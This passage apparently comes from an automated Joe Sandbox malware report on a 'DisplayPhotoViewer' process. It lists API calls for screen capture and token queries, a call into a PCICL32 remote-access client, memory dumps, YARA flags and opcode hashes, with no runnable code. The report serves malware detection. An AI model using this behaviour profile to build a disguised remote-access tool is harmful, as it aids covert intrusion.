                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _malloc_memmove
                                                                                                    • String ID:
                                                                                                    • API String ID: 1183979061-0
                                                                                                    • Opcode ID: cc8697e162e3434f68ad300f31a639764fd201fd1f059a6e11f2fa5353e62f75
                                                                                                    • Instruction ID: 82a9df6770799930052105fa226fbb1c216193503dc12c146611146c4bf91a0b
                                                                                                    • Opcode Fuzzy Hash: cc8697e162e3434f68ad300f31a639764fd201fd1f059a6e11f2fa5353e62f75
                                                                                                    • Instruction Fuzzy Hash: E7F0C8B9E04652AF9782CF2D9844897FBEDDF5A65830480A6F999CB312D631EC0587F0
                                                                                                    APIs
                                                                                                    • _memset.LIBCMT ref: 11083B2F
                                                                                                    • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,1106C2D3,00000000,00000000,1117757E,000000FF), ref: 11083BA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalInitializeSection_memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 453477542-0
                                                                                                    • Opcode ID: 811983831a9b049a6b6bfd64228a3df54c8b55fd956acab057332e78f713cf92
                                                                                                    • Instruction ID: ed86ddefb115c270eed9fa94c2b68f769037bd35a9f0937a366c6d193e9c87ff
                                                                                                    • Opcode Fuzzy Hash: 811983831a9b049a6b6bfd64228a3df54c8b55fd956acab057332e78f713cf92
                                                                                                    • Instruction Fuzzy Hash: 861154B0912B048FC3A4CF7A88816C7FBE9BB49314F90892ED5EEC2200DB716560CF94
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1113A7D1
                                                                                                    • ExtractIconExA.SHELL32(?,00000000,000601D7,0004052B,00000001), ref: 1113A808
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: ExtractFileIconModuleName
• String ID:
• API String ID: 3911389742-0
• Opcode ID: ffaa9e24674eed2b7a188887e5c91b4b0fd0de5efb600298c4b3429a991fa8e8
• Instruction ID: f89515c018f80163da91d4b932c0702da16e94e843d2c50d7bafbc3ccd6a0849
• Opcode Fuzzy Hash: ffaa9e24674eed2b7a188887e5c91b4b0fd0de5efb600298c4b3429a991fa8e8
• Instruction Fuzzy Hash: E1F096786551185FE704CBA4C956FBDB3F8E784708F408169ED5297284CD7059848764
APIs
• HeapCreate.KERNEL32(00000000,00001000,00000000,10705C23,00000001), ref: 10705F78
  • Part of subcall function 10705E1F: GetVersionExA.KERNEL32 ref: 10705E3E
• HeapDestroy.KERNEL32 ref: 10705FB7
  • Part of subcall function 1070613E: HeapAlloc.KERNEL32(00000000,00000140,10705FA0,000003F8), ref: 1070614B
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: Heap$AllocCreateDestroyVersion
• String ID:
• API String ID: 2507506473-0
• Opcode ID: ec1bd4b4e43dbc614b673e36d6da99fb5a9e51dfef66a0e936108a12f2e13c70
• Instruction ID: 4b004725c68517a385d36cc5e969694199c16aad3d11629d2ae2d05f84d08eb7
• Opcode Fuzzy Hash: ec1bd4b4e43dbc614b673e36d6da99fb5a9e51dfef66a0e936108a12f2e13c70
• Instruction Fuzzy Hash: CFF09B70A15353DAE70017309D8971A36D4EB0D781F228A65F500C90DCEFB4E5819B16
APIs
  • Part of subcall function 1113B0A0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?), ref: 1113B0C7
  • Part of subcall function 111592B7: __fsopen.LIBCMT ref: 111592C4
• GetLastError.KERNEL32(?,0BA6C1B8,000000FF,0BA62AB0), ref: 1113B1B5
• Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0BA6C1B8,000000FF,0BA62AB0), ref: 1113B1C5
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
• String ID:
• API String ID: 3768737497-0
• Opcode ID: dae3624ce01fb042922a65e0a34b1ddbeb1f8b1ef21292a8cf894757903d37e4
• Instruction ID: 342d05eea744d5aa4667aac21bd25093e4a099da11b6d9d9dc2088a8b72355dd
• Opcode Fuzzy Hash: dae3624ce01fb042922a65e0a34b1ddbeb1f8b1ef21292a8cf894757903d37e4
• Instruction Fuzzy Hash: AA110475910119ABDB119F95EDC0A6EF3B8FB8667AF004264EC0597208F734AE0487E2
APIs
  • Part of subcall function 1027C531: _free.LIBCMT ref: 1027C544
• _FreeImage_Unload@4.FREEIMAGE(?), ref: 10001DE6
Memory Dump Source
• Source File: 00000006.00000002.3127485200.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_DisplayPhotoViewer.jbxd
Similarity
• API ID: FreeImage_Unload@4_free
• String ID:
• API String ID: 3207628011-0
• Opcode ID: 73aa305a511225a13595f2bd642f2ef5a2f4810be64aa0453c1b7658bf1f110b
• Instruction ID: 03ce1cabda77d57b50c985f9493fe1dba15da5d11f7eccd691666960f6e75faa
• Opcode Fuzzy Hash: 73aa305a511225a13595f2bd642f2ef5a2f4810be64aa0453c1b7658bf1f110b
• Instruction Fuzzy Hash: 9361A075A406559FF701CB28C485F9ABBE2EF453C4F5AC0A9E4489B2A6D771FC50CB80
APIs
• RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00000000,10712290,?), ref: 107047D7
  • Part of subcall function 10707967: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,10708E6F,00000002,?,?,5C74726F,1070599D,?,107059D7,10712290,10712290,00000040,10702706), ref: 107079A4
  • Part of subcall function 10707967: EnterCriticalSection.KERNEL32(?,?,?,10708E6F,00000002,?,?,5C74726F,1070599D,?,107059D7,10712290,10712290,00000040,10702706,?), ref: 107079BF
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: CriticalSection$AllocateEnterHeapInitialize
• String ID:
• API String ID: 1616793339-0
• Opcode ID: 688058804407d6e2ee4bc9a74d0f8d69e32334644716ef0ef732651734102757
• Instruction ID: 03de8040e849dd5e668651183033c73fa30aab1ba865d7b137cda0edc4af50e4
• Opcode Fuzzy Hash: 688058804407d6e2ee4bc9a74d0f8d69e32334644716ef0ef732651734102757
• Instruction Fuzzy Hash: 8721C8B5A00255EBDB00DB68DC85B8EB7F4FB07B64F218315F520EB2C4CB74A9418B94
APIs
• RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110784B,75BF8400,?,?,1113B43F,00000000,CSDVersion,00000000,00000000,?), ref: 11139390
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: c5d3280205221fd340e84b6e60e30db366387d00a69467958e15e896dfb28251
• Instruction ID: e3821f46530a3404db48b549671add8cfb53593bf613581d3259e9333743cb5e
• Opcode Fuzzy Hash: c5d3280205221fd340e84b6e60e30db366387d00a69467958e15e896dfb28251
• Instruction Fuzzy Hash: 9311E9B271824D9FE711CD14D6D0AAFFB6BEFC533AF20912EE95986648E2319842C750
APIs
• GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110F382D
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: InformationToken
• String ID:
• API String ID: 4114910276-0
• Opcode ID: e572e4dfd36f3b2ac6433dbae879d6d5afa028d94d60a173cabc33b0214cb773
• Instruction ID: 7a4e93372285c913da1012181bb6561cef08768253f197538b3e71b702d4a944
• Opcode Fuzzy Hash: e572e4dfd36f3b2ac6433dbae879d6d5afa028d94d60a173cabc33b0214cb773
• Instruction Fuzzy Hash: BC11A971A1065D9BDF51CFA8DC55BEEB3F8DB49704F4040D9E9099B340EA70AE49CB90
APIs
• RtlAllocateHeap.NTDLL(00000008,1102F68F,00000000,?,1115F594,?,1102F68F,00000000,00000000,00000000,?,11160F27,00000001,00000214,?,1110782E), ref: 11165969
  • Part of subcall function 1115EAAF: __getptd_noexit.LIBCMT ref: 1115EAAF
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                                                    • String ID:
                                                                                                    • API String ID: 328603210-0
                                                                                                    • Opcode ID: 6f4d6b66766dd4dfe8de9f5fc7a6321507782b9d4e635d792f6b12f45ab5af02
                                                                                                    • Instruction ID: 313e7e69c54f07852998553f04f77f6103626d614787953a68b782c4070707a1
                                                                                                    • Opcode Fuzzy Hash: 6f4d6b66766dd4dfe8de9f5fc7a6321507782b9d4e635d792f6b12f45ab5af02
                                                                                                    • Instruction Fuzzy Hash: DD01D8353012269AFF968E61C954B56B75CAF837F4F014529EC69CA190FBB1D820C750
                                                                                                    APIs
                                                                                                    • _FreeImage_GetFileTypeFromHandle@12.FREEIMAGE(?,00000000,?,?,103F9370), ref: 10007AC6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3127485200.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3127459389.0000000010000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000102AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000102F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000102F5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.0000000010362000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.000000001036F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.0000000010371000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.000000001037F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103B1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103C1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103E1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3138272696.000000001041B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3138452194.000000001045E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3138495106.000000001045F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3141998762.000000001059E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142048918.00000000105A0000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142110889.00000000105A4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142150062.00000000105A5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142197001.00000000105A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142253419.00000000105A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142293852.00000000105AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFreeFromHandle@12Image_Type
                                                                                                    • String ID:
                                                                                                    • API String ID: 13891659-0
                                                                                                    • Opcode ID: bb46388ed4fd64222bf1fc8e7d83f31561b30475e5b32f7b630e25184afcfa3f
                                                                                                    • Instruction ID: 77ee815f78a67aa20ed704c5e45f7f6262cbe619b030d6fef70e95575e169688
                                                                                                    • Opcode Fuzzy Hash: bb46388ed4fd64222bf1fc8e7d83f31561b30475e5b32f7b630e25184afcfa3f
                                                                                                    • Instruction Fuzzy Hash: AFF0B479D08240179300DA584C0594BBAA4FFC02E0F404D1EF8AC53285D77A9528CBE3
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __waccess_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 4272103461-0
                                                                                                    • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                    • Instruction ID: 0134f9e8721d524dbcf083ea12549a3d448a2fae1be858a1fa593db6deee2031
                                                                                                    • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                    • Instruction Fuzzy Hash: 7BC02B3301401D3F4F048DF1EC00C443F4EC6802347104211F81C88090DE32E8108140
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 1027C544
                                                                                                      • Part of subcall function 1029012C: RtlFreeHeap.NTDLL(00000000,00000000,?,1027C549,?,?,?,10001DFD), ref: 10290142
                                                                                                      • Part of subcall function 1029012C: GetLastError.KERNEL32(?,?,1027C549,?,?,?,10001DFD), ref: 10290154
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3127485200.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3127459389.0000000010000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000102AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000102F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000102F5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.0000000010362000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.000000001036F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.0000000010371000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.000000001037F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103B1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103C1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103E1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3138272696.000000001041B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3138452194.000000001045E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3138495106.000000001045F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3141998762.000000001059E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142048918.00000000105A0000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142110889.00000000105A4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142150062.00000000105A5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142197001.00000000105A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142253419.00000000105A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142293852.00000000105AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFreeHeapLast_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1353095263-0
                                                                                                    • Opcode ID: 941aef3bf095b3a36b1896f22bd55b42b1966ddbe6e84e899dc70eec6287fc02
                                                                                                    • Instruction ID: d783bb707e52019166d7ddca8223eb6047d5917b189198769de99ece4bf57c24
                                                                                                    • Opcode Fuzzy Hash: 941aef3bf095b3a36b1896f22bd55b42b1966ddbe6e84e899dc70eec6287fc02
                                                                                                    • Instruction Fuzzy Hash: B7C08C3140420CBBCB00CF89E806A5EBBA9DB85320F200188FC0C07210DA76AE209AC0
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __fsopen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3646066109-0
                                                                                                    • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                    • Instruction ID: fcf929dadc8dcc6e490536c9fb1a89c4f28d37fcad0ea91f970af9e0224269ae
                                                                                                    • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                    • Instruction Fuzzy Hash: 81C09B7644010C77CF511942DC45E457F1E97D1674F044010FB2C19174A573E5619595
                                                                                                    APIs
                                                                                                    • _NSMClient32@8.PCICL32(?,?,?,07E210A2,00000000), ref: 07E2100B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3116856613.0000000007E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 07E20000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_7e20000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Client32@8
                                                                                                    • String ID:
                                                                                                    • API String ID: 433899448-0
                                                                                                    • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                                    • Instruction ID: 22766281b8558116ff6cfcecda3f6908de310b341c4584554632a048572b1371
                                                                                                    • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                                    • Instruction Fuzzy Hash: 2DB092B211834DDB8714EF99E840C7B339CAA98600B000809BE0543281CA71FC20A672
                                                                                                    APIs
                                                                                                      • Part of subcall function 11084060: IsWindow.USER32(1112865C), ref: 1108407C
                                                                                                      • Part of subcall function 11084060: IsWindow.USER32(?), ref: 11084096
                                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 110076EA
                                                                                                    • SetCursor.USER32(00000000), ref: 110076F1
                                                                                                    • GetDC.USER32(?), ref: 1100771D
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 1100772A
                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007834
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 11007842
                                                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 11007856
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 11007863
                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007875
                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 110078A1
                                                                                                      • Part of subcall function 11002200: DeleteObject.GDI32(?), ref: 11002211
                                                                                                      • Part of subcall function 11002200: CreatePen.GDI32(?,?,?), ref: 11002238
                                                                                                      • Part of subcall function 11005A70: CreateSolidBrush.GDI32(?), ref: 11005A97
                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110078CB
                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 110078E0
                                                                                                    • DeleteObject.GDI32(00000000), ref: 110078ED
                                                                                                    • DeleteDC.GDI32(?), ref: 110078FA
                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 11007917
                                                                                                    • ReleaseDC.USER32(?,?), ref: 11007946
                                                                                                    • CreatePen.GDI32(00000002,00000001,00000000), ref: 11007951
                                                                                                    • CreateSolidBrush.GDI32(?), ref: 11007A42
                                                                                                    • GetSysColor.USER32(00000004), ref: 11007A50
                                                                                                    • LoadBitmapA.USER32(00000000,00002EEF), ref: 11007A67
                                                                                                      • Part of subcall function 11138730: GetObjectA.GDI32(11003CA6,00000018,?), ref: 11138743
                                                                                                      • Part of subcall function 11138730: CreateCompatibleDC.GDI32(00000000), ref: 11138751
                                                                                                      • Part of subcall function 11138730: CreateCompatibleDC.GDI32(00000000), ref: 11138756
                                                                                                      • Part of subcall function 11138730: SelectObject.GDI32(00000000,00000000), ref: 1113876E
                                                                                                      • Part of subcall function 11138730: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 11138781
                                                                                                      • Part of subcall function 11138730: SelectObject.GDI32(00000000,00000000), ref: 1113878C
                                                                                                      • Part of subcall function 11138730: SetBkColor.GDI32(00000000,?), ref: 11138796
                                                                                                      • Part of subcall function 11138730: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 111387B3
                                                                                                      • Part of subcall function 11138730: SetBkColor.GDI32(00000000,00000000), ref: 111387BC
                                                                                                      • Part of subcall function 11138730: SetTextColor.GDI32(00000000,00FFFFFF), ref: 111387C8
